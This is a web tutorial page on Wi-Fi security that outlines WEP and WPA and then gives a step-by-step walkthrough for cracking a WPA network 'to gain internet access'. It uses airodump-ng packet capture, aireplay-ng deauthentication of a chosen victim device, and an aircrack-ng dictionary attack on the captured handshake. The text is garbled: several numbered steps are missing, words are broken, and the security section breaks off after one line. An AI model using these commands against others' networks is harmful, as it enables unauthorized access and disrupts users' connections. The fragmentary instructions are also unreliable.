Category : Ethical Hacking Tutorials
Wireless Fidelity (Wi-Fi) is a technology used for wireless local area network i.e. allowing devices to communicate without cords. The devices used for this particular purpose is based on theIEEE 802.11standards. Wi-Fi allows us to access digital data without being tethered to desk. For Wi-Fi to work it must have internet access
The convenience of Wi-Fi also introduces security concern that exist less in wired world. For current scenario data packets are airborne and available to anyone with ability to intercept and decode them.
To be a good Ethical hacker and penetration tester, you must have knowledge about wireless and its concept, encryptions and threats so as to protect Wi-Fi from hacking.
T-Mobile as well as AT&T t— largest providers of Wi-Fi in coffee café, bookstores and airports sectors — these don't require encryption of data that is travelling wirelessly between laptops/mobile and the Internet. Neither do hotels and municipalities with free Wi-Fi in public areas. T-Mobile and AT&T recommended all customers to download and use their free encryption software and to work on VPN networks.
Wi-Fi eavesdropping is a biggest security concern of all time. Anyone with laptop equipped with Wi-Fi can download Wi-Fi monitoring programs and can sit up to 100 feet away and monitor what a victim is doing on the Net.
There are different set of software we used here to demonstrate you how it is possibly done. Below are the deion provided about the software:
· Kali Linux - It is a Debian-based Linux OS aimed for advanced Penetration Testing (PT) and even for Security Auditing. In Kali hundreds of tools which are developed for various Information security tasks, such as Penetration Testing, Cyber Research, Vulnerability assessment, Cyber Forensics and Reverse Engineering.(to download Kali use link:https://www.kali.org/downloads/)
· Aircrack- It is an 802.11 WEP key cracker. Its main purpose is to find the secret key used during a communication in a wireless network.(for Kali use tool aircrack-ng/Windows downloadhttps://www.aircrack-ng.org/ ) It focuses on:
1. Monitoring: Packet capture and export of data to text files for further processing by third party tools.
2. Attacking: Replay attacks, deauthentication, fake access points and others via packet injection.
3. Testing: Checking WiFi cards and driver capabilities (capture and injection).
4. Cracking: WEP and WPA PSK (WPA 1 and 2).
There is also need of external antenna for intercepting and receiving Wi-Fi connection.
WEP is acronym for Wired Equivalent Privacy. It was developed on IEEE 802.11 WLAN standards. Main goal of WEP was to provide privacy equivalent to that provided by wired networks. WEP works to encrypt the data that has been transmitted over the network to keep it safe from eavesdropping.
WEP has significant flaws and vulnerabilities.
WPAis acronym for the Wi-Fi Protected Access. It is another kind of security protocol developed in response to the flaw found in WEP. WAP is used to encrypt data upon 802.11 WLANs. It uses higher Initial Values of about 48 bits instead of the 24 bits that WEP uses. It uses temporal keys to encrypt the data packets.
As per the survey practical keystroke inference framework that allows an attacker to infer the sensitive keystrokes on a mobile device through WiFi-based side-channel information is one of the most aggressive way to hack and compromise system.
On the basis of study hackers also tries to play with public Wi-Fi to steal other users information and data by hacking mechanism.
How to hack Wi-Fi machine to gain internet access.
1. Open Terminal window in KALI LINUX.
2. Firstly check for wlan service on your system
and try to stop it to kill the work on it.
4. Let the airodump service to complete first and find the ESSID of the Wi-Fi you need to hack.
(use command- airodump-ng –w ESSID -c CH –bssid BSSID OF ESSID
6. Now after scan chooses any station/device you want to disrupt the
internet so that it again do handshake on reconnecting
(use command- aireplay-ng –deauth 10 –a BSSID -c Station wlan0mon).
9. Now using a dictionary file use dictionary attack on the Wi-Fi device using aircrack command in terminal with the Wi-Fi BSSID and its .cap file.
(use command- aircrack–ng -w /root/Desktop/dictionary_filelist -b BSSID /root/.cap file of BSSID generated)
How to secure wireless networks
In minimizing wireless network attacks; an organization can adopt the following policies
Proudly Operated from India
© 2016 Copyrights. All Rights Reserved